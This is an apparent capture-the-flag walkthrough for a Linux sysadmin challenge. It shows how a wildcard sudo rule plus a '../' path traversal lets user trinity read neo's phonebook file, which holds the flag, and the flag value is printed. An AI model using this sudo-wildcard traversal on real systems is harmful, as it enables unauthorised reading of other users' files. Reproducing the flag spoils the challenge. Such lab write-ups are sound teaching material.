Sysadmin Linux part 6 - Level 2

Looking for a password

So we’re looking for neo’s password.
If we ls -l the current folder we’ll see a file named phonebook.

ls -l

total 4
-rw-r----- 1 neo neo 124 Sep 20  2015 phonebook

We see that the file phonebook is own by neo.
Since we do not own the file we can’t file or strings it

Let’s look for the keyword “neo” is the system

cd \
grep -ri --exclude-dir={usr,proc,dev,sys} -w neo | less

The only interesting files is .bashrc that contains a message to Neo

cd
less .bashrc

We see some information in the last part of the .bashrc

hello neo ;)
echo Sup Neo!
$(ls -lart /home/neo)
cat phonebook

Maybe sudo ?

I had no clue what to do next, so i went try to see if i had access to any sudo commands

sudo -l

Got a major breakthough, we can run the following command as sudo

User trinity may run the following commands on this host:
    (neo) /bin/cat /home/trinity/*

That means we can run a sudo command as neo using /bin/cat on everyday that is located in /home/trinity/

sudo -u neo /bin/cat /home/trinity/*

The Oracle        1800-133-7133
Persephone        345-555-1244





copy made by Cypher copy utility on /home/neo/phonebook

There’s good information at the end of the file

First : Copy made by Cypher, that’s another user on the system

Second : The utility is on /home/neo/phonebook

We can now move around the system in cat anything we want as neo

sudo -u neo /bin/cat /home/trinity/../neo/phonebook

The Oracle        1800-133-7133
Persephone        345-555-1244




change my current password FLAG-lRGLKGh2895wIAoOvcBbgk4oL
don‘t forget to remove this :) 

The flag is : FLAG-lRGLKGh2895wIAoOvcBbgk4oL